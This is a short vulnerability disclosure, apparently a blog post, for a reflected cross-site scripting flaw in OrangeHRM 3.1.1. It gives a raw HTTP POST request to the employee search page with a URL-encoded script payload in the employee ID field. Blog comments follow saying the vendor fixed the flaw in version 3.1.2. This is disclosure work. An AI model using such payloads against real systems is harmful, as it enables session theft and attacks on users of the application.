# ==============================================================
# Title ...| XSS vulnerability in OrangeHRM
# Version .| OrangeHRM 3.1.1
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.orangehrm.com
# ==============================================================
[+] from admin user:
# ==============================================================
# XSS
---<request>---
POST /k/cms/orange/orangehrm-3.1.1/symfony/web/index.php/pim/viewEmployeeList HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 418
empsearch%5Bemployee_name%5D%5BempName%5D=asdasd&empsearch%5Bemployee_name%5D%5BempId%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&empsearch%5Bid%5D=&empsearch%5Bemployee_status%5D=0&empsearch%5Btermination%5D=1&empsearch%5Bsupervisor_name%5D=asdasd&empsearch%5Bjob_title%5D=0&empsearch%5Bsub_unit%5D=0&empsearch%5BisSubmitted%5D=yes&empsearch%5B_csrf_token%5D=109e14ec2ad65dc3a8eaa4bf8c28582a&pageNo=&hdnAction=search
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
This reported issue is fixed by OrangeHRM, and the latest OrangeHRM open source version is released.
ReplyDeleteOrangeHRM 3.1.2 has been released to SourceForge with security related fixes.
Released on (May 20, 2014)
Download URL of zip archive : http://sourceforge.net/projects/orangehrm/files/stable/3.1.2/orangehrm-3.1.2.zip/download
Kavitha: big thanks for the update ;)
ReplyDeleteiyomi: thank you too ;)
If you will have any questions, feel free to contact me.
o/